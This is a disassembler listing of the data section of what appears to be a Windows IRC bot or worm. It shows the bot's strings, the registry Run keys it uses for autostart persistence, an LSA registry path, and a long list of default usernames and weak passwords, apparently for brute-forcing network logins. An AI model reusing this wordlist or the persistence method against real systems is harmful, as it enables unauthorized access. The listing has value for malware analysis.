aSaad__0 db 'saad.',0 ; DATA XREF: sub_40E6A9+4BB�o
align 4
byte_42F678 db 62h ; DATA XREF: sub_402B84+F�o
; sub_4030E8+81�o ...
db 74h, 6Dh, 6Fh
dd 6979676Bh, 78652E77h, 65h
dword_42F688 dd 65627663h, 6C642E69h, 6Ch ; DATA XREF: sub_4022C6+3D�o
aSystam13 db 'Systam13',0 ; DATA XREF: sub_40C1AE+E�o
align 10h
aBot db '[bot]-',0 ; DATA XREF: sub_415994+12�o
align 4
aFirstswin_exe db 'firstswin.exe',0
align 4
aXi db '+xi',0 ; DATA XREF: sub_40EE72+6272�o
aF db '#f',0 ; DATA XREF: sub_40EE72:loc_4120EF�o
; sub_40EE72+50A0�o ...
align 10h
aF_0 db '#f',0 ; DATA XREF: sub_40EE72+1F2F�o
align 4
aF_1 db '#f',0 ; DATA XREF: sub_40EE72+1D75�o
align 4
off_42F6C8 dd offset a@admin_com ; DATA XREF: sub_40EE72:loc_414FEC�o
; "*@admin.com"
off_42F6CC dd offset aH4ckerTool ; DATA XREF: sub_40EE72+8CF�r
; sub_40EE72+6196�o
; "h4cker tool"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 10h
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_415F86+28�o
; sub_4162AA+28�o
align 10h
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_415F86+D4�o
; sub_4162AA+D4�o
align 4
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd 0
dd offset byte_43C80C
dd offset byte_43C80C
dd offset aAdministrato_1 ; "ADMINISTRATOR"
dd offset aAdministrator ; "Administrator"
dd offset aAdministrato_0 ; "administrator"
dd offset aFubar ; "fubar"
dd offset aBla ; "bla"
dd offset aGuest_1 ; "GUEST"
dd offset aRoot_0 ; "ROOT"
dd offset aRoot ; "root"
dd offset aAdmin_0 ; "ADMIN"
dd offset aPassword ; "PASSWORD"
dd offset aTemp ; "TEMP"
dd offset aShare_0 ; "SHARE"
dd offset aWrite ; "WRITE"
dd offset aFull_0 ; "FULL"
dd offset aLadeda ; "ladeda"
dd offset aBoth ; "BOTH"
dd offset aRead ; "READ"
dd offset aFiles ; "FILES"
dd offset aDemo ; "DEMO"
dd offset aOwner_0 ; "OWNER"
dd offset aOwner_1 ; "Owner"
dd offset aEdu ; "edu"
dd offset aTest ; "TEST"
dd offset aAccess ; "ACCESS"
dd offset aUser_0 ; "USER"
dd offset aBackup ; "BACKUP"
dd offset aSystem ; "SYSTEM"
dd offset aServer_0 ; "SERVER"
dd offset aPepsi ; "pepsi"
dd offset aLocal ; "LOCAL"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aChangeme_0 ; "Changeme"
dd offset aTemp123 ; "temp123"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a654321 ; "654321"
dd offset a54321 ; "54321"
dd offset a111 ; "111"
dd offset a11111111 ; "11111111"
dd offset a88888888 ; "88888888"
dd offset aPass_0 ; "pass"
dd offset aPasswd ; "passwd"
dd offset aDatabase ; "database"
dd offset aAbcd ; "abcd"
dd offset aAbc123 ; "abc123"
dd offset aOracle ; "oracle"
dd offset aSybase ; "sybase"
dd offset a123qwe ; "123qwe"
dd offset aComputer ; "computer"
dd offset aInternet ; "Internet"
dd offset aSuper ; "super"
dd offset a123asd ; "123asd"
dd offset aIhavenopass ; "ihavenopass"
dd offset aGodblessyou ; "godblessyou"
dd offset aEnable ; "enable"
dd offset aXp_0 ; "xp"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2600 ; "2600"
dd offset a110 ; "110"
dd offset a111111 ; "111111"
dd offset a121212 ; "121212"
dd offset a123123 ; "123123"
dd offset a1234qwer ; "1234qwer"
dd offset a123abc ; "123abc"
dd offset a007 ; "007"
dd offset aAlpha ; "alpha"
dd offset aPatrick ; "patrick"
dd offset aPat ; "pat"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aFoobar ; "foobar"
dd offset aNilez ; "Nilez"
dd offset aDevil ; "devil"
dd offset aNetdevil ; "netdevil"
dd offset aNetDevil ; "net-devil"
dd offset a0wned ; "0wned"
dd offset aOwned ; "owned"
dd offset aIrule ; "irule"
dd offset aNetfuck ; "netfuck"
dd offset aFucked ; "fucked"
dd offset aCrash ; "crash"
dd offset aA_1 ; "a"
dd offset aAaa ; "aaa"
dd offset aAbc ; "abc"
dd offset aTest123 ; "test123"
dd offset aWin ; "win"
dd offset aPc ; "pc"
dd offset aAsdf ; "asdf"
dd offset aSecret ; "secret"
dd offset aQwer ; "qwer"
dd offset aYxcv ; "yxcv"
dd offset aZxcv ; "zxcv"
dd offset aHome ; "home"
dd offset aLogin ; "login"
dd offset aPwd ; "pwd"
dd offset aLove ; "love"
dd offset aMypc ; "mypc"
dd offset aMypc123 ; "mypc123"
dd offset aAdmin123 ; "admin123"
dd offset aPw123 ; "pw123"
dd offset aMypass ; "mypass"
dd offset aMypass123 ; "mypass123"
dd offset aPw ; "pw"
dd offset aMat ; "Mat"
dd offset aMatt ; "Matt"
dd offset aMatthew ; "Matthew"
dd offset aGobo ; "gobo"
dd offset aSatan ; "satan"
dd offset aSatanik ; "satanik"
dd offset aSatanic ; "satanic"
dd offset aSpaceman ; "spaceman"
dd offset aHeaven ; "heaven"
dd offset aW00t ; "w00t"
dd offset a0wn3d ; "0wn3d"
dd offset aKiller ; "killer"
dd offset aLeet ; "leet"
dd offset aL33t ; "l33t"
dd offset aL337 ; "l337"
dd offset aHacker ; "hacker"
dd offset aHax0r ; "hax0r"
dd offset aScript ; "script"
dd offset aScriptkiddie ; "scriptkiddie"
dd offset aKiddie ; "kiddie"
dd offset aMirc_0 ; "mirc"
dd offset aUwontguessme ; "uwontguessme"
dd offset aYouwontguessme ; "youwontguessme"
dd offset aGuessme ; "guessme"
dd offset asc_434C30 ; "x"
dd offset aXx ; "xx"
dd offset aXxx ; "xxx"
dd offset aXxxx ; "xxxx"
dd offset aXxxxx ; "xxxxx"
dd offset aXxxxxx ; "xxxxxx"
dd offset aXxxxxxx ; "xxxxxxx"
dd offset aXxxxxxxx ; "xxxxxxxx"
dd offset aXxxxxxxxx ; "xxxxxxxxx"
dd offset dword_4289BC
dd offset a00 ; "00"
dd offset aDeath ; "death"
dd offset aTesting ; "testing"
dd offset a000 ; "000"
dd offset a0000 ; "0000"
dd offset a00000 ; "00000"
dd offset a000000 ; "000000"
dd offset aAcademia ; "academia"
dd offset aAcademic ; "academic"
dd offset aAccept ; "accept"
dd offset aAccount ; "account"
dd offset aAction ; "action"
dd offset aAdam ; "adam"
dd offset aAdrian ; "adrian"
dd offset aAdrianna ; "adrianna"
dd offset aAdult ; "adult"
dd offset aAerobics ; "aerobics"
dd offset aAids ; "aids"
dd offset aAirplane ; "airplane"
dd offset aAlaska ; "alaska"
dd offset aAlbany ; "albany"
dd offset aAlbatros ; "albatros"
dd offset aAlbert ; "albert"
dd offset aAlert ; "alert"
dd offset aAlex ; "alex"
dd offset aAlexande ; "alexande"
dd offset aAlgebra ; "algebra"
dd offset aAlias ; "alias"
dd offset aAliases ; "aliases"
dd offset aAlice ; "alice"
dd offset aAlicia ; "alicia"
dd offset aAlisa ; "alisa"
dd offset aAlison ; "alison"
dd offset aAllison ; "allison"
dd offset aAllow ; "allow"
dd offset aAlphabet ; "alphabet"
dd offset aAmadeus ; "amadeus"
dd offset aAmanda ; "amanda"
dd offset aAmber ; "amber"
dd offset aAmerica ; "america"
dd offset aAmorphou ; "amorphou"
dd offset aAnal ; "anal"
dd offset aAnalog ; "analog"
dd offset aAnarchis ; "anarchis"
dd offset aAnarchy ; "anarchy"
dd offset aAnchor ; "anchor"
dd offset aAndrea ; "andrea"
dd offset aAndroid ; "android"
dd offset aAndromac ; "andromac"
dd offset aAndy ; "andy"
dd offset aAnfo ; "anfo"
dd offset aAngela ; "angela"
dd offset aAngerine ; "angerine"
dd offset aAngie ; "angie"
dd offset aAnimal ; "animal"
dd offset aAnimals ; "animals"
dd offset aAnita ; "anita"
dd offset aAnna ; "anna"
dd offset aAnne ; "anne"
dd offset aAnnette ; "annette"
dd offset aAnon ; "anon"
dd offset aAnonymou ; "anonymou"
dd offset aAnswer ; "answer"
dd offset aAnthrax ; "anthrax"
dd offset aAnthropo ; "anthropo"
dd offset aAnvils ; "anvils"
dd offset aAnything ; "anything"
dd offset aApollo13 ; "apollo13"
dd offset aApril ; "april"
dd offset aAria ; "aria"
dd offset aAriadne ; "ariadne"
dd offset aArlene ; "arlene"
dd offset aArmy ; "army"
dd offset aArrow ; "arrow"
dd offset aArthur ; "arthur"
dd offset aArtist ; "artist"
dd offset aAsian ; "asian"
dd offset aAsshole ; "asshole"
dd offset aAthena ; "athena"
dd offset aAtmosphe ; "atmosphe"
dd offset aAtom ; "atom"
dd offset aAttack ; "attack"
dd offset aAuthoriz ; "authoriz"
dd offset aAztecs ; "aztecs"
dd offset aAzure ; "azure"
dd offset aBabe ; "babe"
dd offset aBaby ; "baby"
dd offset aBacchus ; "bacchus"
dd offset aBackdoor ; "backdoor"
dd offset aBadass ; "badass"
dd offset aBailey ; "bailey"
dd offset aBall ; "ball"
dd offset aBanana ; "banana"
dd offset aBananas ; "bananas"
dd offset aBandit ; "bandit"
dd offset aBank ; "bank"
dd offset aBanks ; "banks"
dd offset aBarbara ; "barbara"
dd offset aBarber ; "barber"
dd offset aBare ; "bare"
dd offset aBarf ; "barf"
dd offset aBaritone ; "baritone"
dd offset aBart ; "bart"
dd offset aBartman ; "bartman"
dd offset aBaseball ; "baseball"
dd offset aBasic ; "basic"
dd offset aBass ; "bass"
dd offset aBassoon ; "bassoon"
dd offset aBatch ; "batch"
dd offset aBatman ; "batman"
dd offset aBeach ; "beach"
dd offset aBeammeup ; "beammeup"
dd offset aBear ; "bear"
dd offset aBeast ; "beast"
dd offset aBeater ; "beater"
dd offset aBeauty ; "beauty"
dd offset aBeaver ; "beaver"
dd offset aBecky ; "becky"
dd offset aBeethove ; "beethove"
dd offset aBegin ; "begin"
dd offset aBehead ; "behead"
dd offset aBell ; "bell"
dd offset aBeloved ; "beloved"
dd offset aBenz ; "benz"
dd offset aBeowulf ; "beowulf"
dd offset aBerkeley ; "berkeley"
dd offset aBerlin ; "berlin"
dd offset aBerliner ; "berliner"
dd offset aBeryl ; "beryl"
dd offset aBeta ; "beta"
dd offset aBeth ; "beth"
dd offset aBetsie ; "betsie"
dd offset aBetty ; "betty"
dd offset aBeverly ; "beverly"
dd offset aBible ; "bible"
dd offset aBicamera ; "bicamera"
dd offset aBigfoot ; "bigfoot"
dd offset aBill ; "bill"
dd offset aBinary ; "binary"
dd offset aBios ; "bios"
dd offset aBird ; "bird"
dd offset aBishop ; "bishop"
dd offset aBitch ; "bitch"
dd offset aBitmap ; "bitmap"
dd offset aBitnet ; "bitnet"
dd offset aBlack ; "black"
dd offset aBlonde ; "blonde"
dd offset aBlondie ; "blondie"
dd offset aBlood ; "blood"
dd offset aBloodaxe ; "bloodaxe"
dd offset aBlow ; "blow"
dd offset aBlowjob ; "blowjob"
dd offset aBlue ; "blue"
dd offset aBlues ; "blues"
dd offset aBoard ; "board"
dd offset aBomb ; "bomb"
dd offset aBoner ; "boner"
dd offset aBoob ; "boob"
dd offset aBoobs ; "boobs"
dd offset aBook ; "book"
dd offset aBorn ; "born"
dd offset aBoyscout ; "boyscout"
dd offset aBradley ; "bradley"
dd offset aBrandi ; "brandi"
dd offset aBrandy ; "brandy"
dd offset aBravo ; "bravo"
dd offset aBreak ; "break"
dd offset aBreast ; "breast"
dd offset aBrenda ; "brenda"
dd offset aBrian ; "brian"
dd offset aBridget ; "bridget"
dd offset aBroadway ; "broadway"
dd offset aBrothel ; "brothel"
dd offset aBrunette ; "brunette"
dd offset aBrute ; "brute"
dd offset aBrutefor ; "brutefor"
dd offset aBulls ; "bulls"
dd offset aBullshit ; "bullshit"
dd offset aBumbling ; "bumbling"
dd offset aBung ; "bung"
dd offset aBurgess ; "burgess"
dd offset aBurn ; "burn"
dd offset aButch ; "butch"
dd offset aButt ; "butt"
dd offset aButthead ; "butthead"
dd offset aCaliforn ; "californ"
dd offset aCamille ; "camille"
dd offset aCampanil ; "campanil"
dd offset aCamping ; "camping"
dd offset aCandi ; "candi"
dd offset aCandy ; "candy"
dd offset aCantor ; "cantor"
dd offset aCaptain ; "captain"
dd offset aCapture ; "capture"
dd offset aCard ; "card"
dd offset aCardinal ; "cardinal"
dd offset aCaren ; "caren"
dd offset aCarla ; "carla"
dd offset aCarmen ; "carmen"
dd offset aCarol ; "carol"
dd offset aCarole ; "carole"
dd offset aCarolina ; "carolina"
dd offset aCaroline ; "caroline"
dd offset aCarrie ; "carrie"
dd offset aCarson ; "carson"
dd offset aCascades ; "cascades"
dd offset aCash ; "cash"
dd offset aCastle ; "castle"
dd offset aCatherin ; "catherin"
dd offset aCatholic ; "catholic"
dd offset aCathy ; "cathy"
dd offset aCave ; "cave"
dd offset aCayuga ; "cayuga"
dd offset aCecily ; "cecily"
dd offset aCelt ; "celt"
dd offset aCeltic ; "celtic"
dd offset aCeltics ; "celtics"
dd offset aCerulean ; "cerulean"
dd offset aChange ; "change"
dd offset aCharity ; "charity"
dd offset aCharles ; "charles"
dd offset aCharlie ; "charlie"
dd offset aCharming ; "charming"
dd offset aCharon ; "charon"
dd offset aChat_0 ; "chat"
dd offset aChem ; "chem"
dd offset aChemistr ; "chemistr"
dd offset aChess ; "chess"
dd offset aChester ; "chester"
dd offset aChip ; "chip"
dd offset aChris ; "chris"
dd offset aChristin ; "christin"
dd offset aChristy ; "christy"
dd offset aCigar ; "cigar"
dd offset aCigarett ; "cigarett"
dd offset aCindy ; "cindy"
dd offset aClass ; "class"
dd offset aClasses ; "classes"
dd offset aClassic ; "classic"
dd offset aClaudia ; "claudia"
dd offset aClaymore ; "claymore"
dd offset aCleavage ; "cleavage"
dd offset aClinton ; "clinton"
dd offset aCluster ; "cluster"
dd offset aClusters ; "clusters"
dd offset aCoast ; "coast"
dd offset aCocacola ; "cocacola"
dd offset aCocainco ; "cocainco"
dd offset aCock ; "cock"
dd offset aCode ; "code"
dd offset aCodename ; "codename"
dd offset aCodeword ; "codeword"
dd offset aCoffee ; "coffee"
dd offset aCoin ; "coin"
dd offset aCoke ; "coke"
dd offset aCola ; "cola"
dd offset aCold ; "cold"
dd offset aCollins ; "collins"
dd offset aColor ; "color"
dd offset aCombat ; "combat"
dd offset aComics ; "comics"
dd offset aCommit ; "commit"
dd offset aCommrade ; "commrade"
dd offset aCompany ; "company"
dd offset aComputin ; "computin"
dd offset aComrade ; "comrade"
dd offset aComrades ; "comrades"
dd offset aCondo ; "condo"
dd offset aCondom ; "condom"
dd offset aConnect ; "connect"
dd offset aConnie ; "connie"
dd offset aConserva ; "conserva"
dd offset aConsole ; "console"
dd offset aContinue ; "continue"
dd offset aCook ; "cook"
dd offset aCookbook ; "cookbook"
dd offset aCookie ; "cookie"
dd offset aCool_1 ; "cool"
dd offset aCooper ; "cooper"
dd offset aCopper ; "copper"
dd offset aCops ; "cops"
dd offset aCopy ; "copy"
dd offset aCorneliu ; "corneliu"
dd offset aCorrect ; "correct"
dd offset aCounters ; "counters"
dd offset aCountry ; "country"
dd offset aCouscous ; "couscous"
dd offset aCowboy ; "cowboy"
dd offset aCrack ; "crack"
dd offset aCrackpot ; "crackpot"
dd offset aCream ; "cream"
dd offset aCreate ; "create"
dd offset aCreation ; "creation"
dd offset aCreature ; "creature"
dd offset aCredit ; "credit"
dd offset aCreosote ; "creosote"
dd offset aCretin ; "cretin"
dd offset aCrime ; "crime"
dd offset aCriminal ; "criminal"
dd offset aCristina ; "cristina"
dd offset aCrystal ; "crystal"
dd offset aCshrc ; "cshrc"
dd offset aCunt ; "cunt"
dd offset aCustomer ; "customer"
dd offset aCyber ; "cyber"
dd offset aCyberpun ; "cyberpun"
dd offset aCyberspa ; "cyberspa"
dd offset aCynthia ; "cynthia"
dd offset aDaemon ; "daemon"
dd offset aDaisy ; "daisy"
dd offset aDana ; "dana"
dd offset aDancer ; "dancer"
dd offset aDaniel ; "daniel"
dd offset aDanielle ; "danielle"
dd offset aDanny ; "danny"
dd offset aDapper ; "dapper"
dd offset aDark ; "dark"
dd offset aDarkaven ; "darkaven"
dd offset aData ; "data"
dd offset aDave ; "dave"
dd offset aDawn ; "dawn"
dd offset aDead ; "dead"
dd offset aDeathsta ; "deathsta"
dd offset aDebbie ; "debbie"
dd offset aDeborah ; "deborah"
dd offset aDebug ; "debug"
dd offset aDecember ; "december"
dd offset aDeck ; "deck"
dd offset aDefault ; "default"
dd offset aDefault_0 ; "DEFAULT"
dd offset aDefoe ; "defoe"
dd offset aDelta ; "delta"
dd offset aDeluge ; "deluge"
dd offset aDemocrat ; "democrat"
dd offset aDenise ; "denise"
dd offset aDennis ; "dennis"
dd offset aDesiree ; "desiree"
dd offset aDesk ; "desk"
dd offset aDesktop ; "desktop"
dd offset aDesperat ; "desperat"
dd offset aDevelop ; "develop"
dd offset aDevice ; "device"
dd offset aDial ; "dial"
dd offset aDiamond ; "diamond"
dd offset aDiana ; "diana"
dd offset aDiane ; "diane"
dd offset aDice ; "dice"
dd offset aDick ; "dick"
dd offset aDiehard ; "diehard"
dd offset aDiet ; "diet"
dd offset aDieter ; "dieter"
dd offset aDigital ; "digital"
dd offset aDinosaur ; "dinosaur"
dd offset aDipshit ; "dipshit"
dd offset aDirect ; "direct"
dd offset aDirector ; "director"
dd offset aDirty ; "dirty"
dd offset aDisc ; "disc"
dd offset aDiscipli ; "discipli"
dd offset aDisclose ; "disclose"
dd offset aDiscover ; "discover"
dd offset aDisk_0 ; "disk"
dd offset aDiskette ; "diskette"
dd offset aDisney ; "disney"
dd offset aDisplay_0 ; "display"
dd offset aDoctor ; "doctor"
dd offset aDollar ; "dollar"
dd offset aDong ; "dong"
dd offset aDoom ; "doom"
dd offset aDoom2 ; "doom2"
dd offset aDoomii ; "doomii"
dd offset aDoomsday ; "doomsday"
dd offset aDoonesbu ; "doonesbu"
dd offset aDoor ; "door"
dd offset aDoors ; "doors"
dd offset aDope ; "dope"
dd offset aDownload ; "download"
dd offset aDragon ; "dragon"
dd offset aDrdoom ; "drdoom"
dd offset aDrive ; "drive"
dd offset aDrought ; "drought"
dd offset aDuck ; "duck"
dd offset aDude ; "dude"
dd offset aDuelist ; "duelist"
dd offset aDuke ; "duke"
dd offset aDulce ; "dulce"
dd offset aDuncan ; "duncan"
dd offset aDungeon ; "dungeon"
dd offset aDyke ; "dyke"
dd offset aEager ; "eager"
dd offset aEagle ; "eagle"
dd offset aEarth ; "earth"
dd offset aEasier ; "easier"
dd offset aEasy ; "easy"
dd offset aEatme ; "eatme"
dd offset aEcho ; "echo"
off_430050 dd offset aEddie ; DATA XREF: _2:00427B70�o
; "eddie"
dd offset aEdges ; "edges"
dd offset aEdinburg ; "edinburg"
off_43005C dd offset aEdit ; DATA XREF: _2:off_427A0C�o
; "edit"
dd offset aEdition ; "edition"
dd offset aEducation ; "education"
dd offset aEducatio ; "educatio"
dd offset aEdwin ; "edwin"
dd offset aEdwina ; "edwina"
dd offset aEgghead ; "egghead"
dd offset aEiderdow ; "eiderdow"
dd offset aEileen ; "eileen"
dd offset aEinsiein ; "einsiein"
dd offset aEinstein ; "einstein"
dd offset aElaine ; "elaine"
dd offset aElanor ; "elanor"
dd offset aElectron ; "electron"
dd offset aElephant ; "elephant"
dd offset aElizabet ; "elizabet"
dd offset aEllen ; "ellen"
dd offset aEmail ; "email"
dd offset aEmerald ; "emerald"
dd offset aEmily ; "emily"
dd offset aEmmanuel ; "emmanuel"
dd offset aEnemy ; "enemy"
dd offset aEngine ; "engine"
dd offset aEngineer ; "engineer"
dd offset aEngland ; "england"
dd offset aEnglish ; "english"
dd offset aEnter ; "enter"
dd offset aEnterpri ; "enterpri"
dd offset aEnzyme ; "enzyme"
dd offset aErenity ; "erenity"
dd offset aEric ; "eric"
dd offset aErica ; "erica"
dd offset aErika ; "erika"
dd offset aErin ; "erin"
dd offset aErotic ; "erotic"
dd offset aErsatz ; "ersatz"
dd offset aEstablis ; "establis"
dd offset aEstate ; "estate"
dd offset aEternity ; "eternity"
dd offset aEuclid ; "euclid"
dd offset aEvelyn ; "evelyn"
dd offset aExpert ; "expert"
dd offset aExplode ; "explode"
dd offset aExplore ; "explore"
dd offset aExplorer ; "explorer"
dd offset aExplosiv ; "explosiv"
dd offset aExtensio ; "extensio"
dd offset aFairway ; "fairway"
dd offset aFaith ; "faith"
dd offset aFalcon ; "falcon"
dd offset aFalse ; "false"
dd offset aFamily ; "family"
dd offset aFarad ; "farad"
dd offset aFaraday ; "faraday"
dd offset aFart ; "fart"
dd offset aFast ; "fast"
dd offset aFear ; "fear"
dd offset aFeds ; "feds"
dd offset aFelicia ; "felicia"
dd offset aFender ; "fender"
dd offset aFermat ; "fermat"
dd offset aFerrari ; "ferrari"
dd offset aFidelity ; "fidelity"
dd offset aField ; "field"
dd offset aFight ; "fight"
dd offset aFile ; "file"
dd offset aFinite ; "finite"
dd offset aFire ; "fire"
dd offset aFirewall ; "firewall"
dd offset aFishers ; "fishers"
dd offset aFlakes ; "flakes"
dd offset aFloat ; "float"
dd offset aFlorida ; "florida"
dd offset aFlower ; "flower"
dd offset aFlowers ; "flowers"
dd offset aFood ; "food"
dd offset aFool ; "fool"
dd offset aFoolproo ; "foolproo"
dd offset aFootball ; "football"
dd offset aForce ; "force"
dd offset aFord ; "ford"
dd offset aForesigh ; "foresigh"
dd offset aForever ; "forever"
dd offset aForm ; "form"
dd offset aFormat ; "format"
dd offset aFornicat ; "fornicat"
dd offset aForsythe ; "forsythe"
dd offset aFourier ; "fourier"
dd offset aFoxtrot ; "foxtrot"
dd offset aFrance ; "france"
dd offset aFrank ; "frank"
dd offset aFreak ; "freak"
dd offset aFred ; "fred"
dd offset aFree ; "free"
dd offset aFreedom ; "freedom"
dd offset aFrench ; "french"
dd offset aFriday ; "friday"
dd offset aFriend ; "friend"
dd offset aFriends ; "friends"
dd offset aFrighten ; "frighten"
dd offset aFrog ; "frog"
dd offset aFryguy ; "fryguy"
dd offset aFuck ; "fuck"
dd offset aFucker ; "fucker"
dd offset aFucking ; "fucking"
dd offset aFuckme ; "fuckme"
dd offset aFuckyou ; "fuckyou"
dd offset aFudge ; "fudge"
dd offset aFunction ; "function"
dd offset aFungible ; "fungible"
dd offset aGabriel ; "gabriel"
dd offset aGames ; "games"
dd offset aGardner ; "gardner"
dd offset aGarfield ; "garfield"
dd offset aGateway ; "gateway"
dd offset aGatherin ; "gatherin"
dd offset aGatt ; "gatt"
dd offset aGauss ; "gauss"
dd offset aGeorge ; "george"
dd offset aGerm ; "germ"
dd offset aGertrude ; "gertrude"
dd offset aGhost ; "ghost"
dd offset aGibson ; "gibson"
dd offset aGigabyte ; "gigabyte"
dd offset aGina ; "gina"
dd offset aGinger ; "ginger"
dd offset aGirl ; "girl"
dd offset aGlacier ; "glacier"
dd offset aGold ; "gold"
dd offset aGolden ; "golden"
dd offset aGolf ; "golf"
dd offset aGolfer ; "golfer"
dd offset aGood ; "good"
dd offset aGorgeous ; "gorgeous"
dd offset aGorges ; "gorges"
dd offset aGosling ; "gosling"
dd offset aGouge ; "gouge"
dd offset aGovermen ; "govermen"
dd offset aGrades ; "grades"
dd offset aGraham ; "graham"
dd offset aGrahm ; "grahm"
dd offset aGrand ; "grand"
dd offset aGrant ; "grant"
dd offset aGreat ; "great"
dd offset aGreen ; "green"
dd offset aGroup ; "group"
dd offset aGryphon ; "gryphon"
dd offset aGuardian ; "guardian"
dd offset aGucci ; "gucci"
dd offset aGuess ; "guess"
dd offset aGuitar ; "guitar"
dd offset aGumption ; "gumption"
dd offset aGuntis ; "guntis"
dd offset aHack ; "hack"
dd offset aHacked ; "hacked"
dd offset aHagar ; "hagar"
dd offset aHair ; "hair"
dd offset aHallowee ; "hallowee"
dd offset aHamlet ; "hamlet"
dd offset aHamster ; "hamster"
dd offset aHandel ; "handel"
dd offset aHandily ; "handily"
dd offset aHandjob ; "handjob"
dd offset aHappenin ; "happenin"
dd offset aHard ; "hard"
dd offset aHardcore ; "hardcore"
dd offset aHarddriv ; "harddriv"
dd offset aHarmony ; "harmony"
dd offset aHarold ; "harold"
dd offset aHarvey ; "harvey"
dd offset aHate ; "hate"
dd offset aHaven ; "haven"
dd offset aHawaii ; "hawaii"
dd offset aHead ; "head"
dd offset aHeadbang ; "headbang"
dd offset aHeat ; "heat"
dd offset aHeathen ; "heathen"
dd offset aHeather ; "heather"
dd offset aHebrides ; "hebrides"
dd offset aHeidi ; "heidi"
dd offset aHeinlein ; "heinlein"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aHelp ; "help"
dd offset aHerb ; "herb"
dd offset aHerbert ; "herbert"
dd offset aHero ; "hero"
dd offset aHeroin ; "heroin"
dd offset aHewlett ; "hewlett"
dd offset aHexadeci ; "hexadeci"
dd offset aHiawatha ; "hiawatha"
dd offset aHibernia ; "hibernia"
dd offset aHidden ; "hidden"
dd offset aHigh ; "high"
dd offset aHighland ; "highland"
dd offset aHitler ; "hitler"
dd offset aHits ; "hits"
dd offset aHole ; "hole"
dd offset aHolly ; "holly"
dd offset aHollywoo ; "hollywoo"
dd offset aHomepage ; "homepage"
dd offset aHomer ; "homer"
dd offset aHomework ; "homework"
dd offset aHoney ; "honey"
dd offset aHooker ; "hooker"
dd offset aHooters ; "hooters"
dd offset aHorny ; "horny"
dd offset aHorrible ; "horrible"
dd offset aHorror ; "horror"
dd offset aHorse ; "horse"
dd offset aHorus ; "horus"
dd offset aHost ; "host"
dd offset aHotdog ; "hotdog"
dd offset aHotel ; "hotel"
dd offset aHttp_0 ; "http"
dd offset aHunt ; "hunt"
dd offset aHunter ; "hunter"
dd offset aHutchins ; "hutchins"
dd offset aHydrogen ; "hydrogen"
dd offset aHyper ; "hyper"
dd offset aHypertxt ; "hypertxt"
dd offset aIcecream ; "icecream"
dd offset aIllumina ; "illumina"
dd offset aImage ; "image"
dd offset aImbrogli ; "imbrogli"
dd offset aImmortal ; "immortal"
dd offset aImperial ; "imperial"
dd offset aInclude ; "include"
dd offset aIndia ; "india"
dd offset aIndian ; "indian"
dd offset aIndiana ; "indiana"
dd offset aIndians ; "indians"
dd offset aIngres ; "ingres"
dd offset aIngress ; "ingress"
dd offset aIngrid ; "ingrid"
dd offset aInna ; "inna"
dd offset aInnocuou ; "innocuou"
dd offset aInput ; "input"
dd offset aInside ; "inside"
dd offset aInteger ; "integer"
dd offset aInvent ; "invent"
dd offset aIrene ; "irene"
dd offset aIrishman ; "irishman"
dd offset aIsis ; "isis"
dd offset aJackie ; "jackie"
dd offset aJail ; "jail"
dd offset aJane ; "jane"
dd offset aJanet ; "janet"
dd offset aJanice ; "janice"
dd offset aJanie ; "janie"
dd offset aJapan ; "japan"
dd offset aJasmin ; "jasmin"
dd offset aJava ; "java"
dd offset aJazz ; "jazz"
dd offset aJean ; "jean"
dd offset aJeanne ; "jeanne"
dd offset aJeff ; "jeff"
dd offset aJenni ; "jenni"
dd offset aJennifer ; "jennifer"
dd offset aJenny ; "jenny"
dd offset aJerry ; "jerry"
dd offset aJerusale ; "jerusale"
dd offset aJessica ; "jessica"
dd offset aJester ; "jester"
dd offset aJewelry ; "jewelry"
dd offset aJill ; "jill"
dd offset aJixian ; "jixian"
dd offset aJoanne ; "joanne"
dd offset aJody ; "jody"
dd offset aJohn ; "john"
dd offset aJohndoe ; "johndoe"
dd offset aJohnny ; "johnny"
dd offset aJoseph ; "joseph"
dd offset aJoshua ; "joshua"
dd offset aJournal ; "journal"
dd offset aJoyce ; "joyce"
dd offset aJudith ; "judith"
dd offset aJudy ; "judy"
dd offset aJuggle ; "juggle"
dd offset aJuicy ; "juicy"
dd offset aJulia ; "julia"
dd offset aJulie ; "julie"
dd offset aJuliet ; "juliet"
dd offset aJune ; "june"
dd offset aJupiter ; "jupiter"
dd offset aKaka ; "kaka"
dd offset aKaren ; "karen"
dd offset aKarie ; "karie"
dd offset aKarina ; "karina"
dd offset aKatana ; "katana"
dd offset aKate ; "kate"
dd offset aKathleen ; "kathleen"
dd offset aKathrine ; "kathrine"
dd offset aKathy ; "kathy"
dd offset aKatina ; "katina"
dd offset aKatrina ; "katrina"
dd offset aKelly ; "kelly"
dd offset aKeri ; "keri"
dd offset aKermit ; "kermit"
dd offset aKernel ; "kernel"
dd offset aKerri ; "kerri"
dd offset aKerrie ; "kerrie"
dd offset aKerry ; "kerry"
dd offset aKevin ; "kevin"
dd offset aKewl ; "kewl"
dd offset aKeybord ; "keybord"
dd offset aKeyin ; "keyin"
dd offset aKeyword ; "keyword"
dd offset aKids ; "kids"
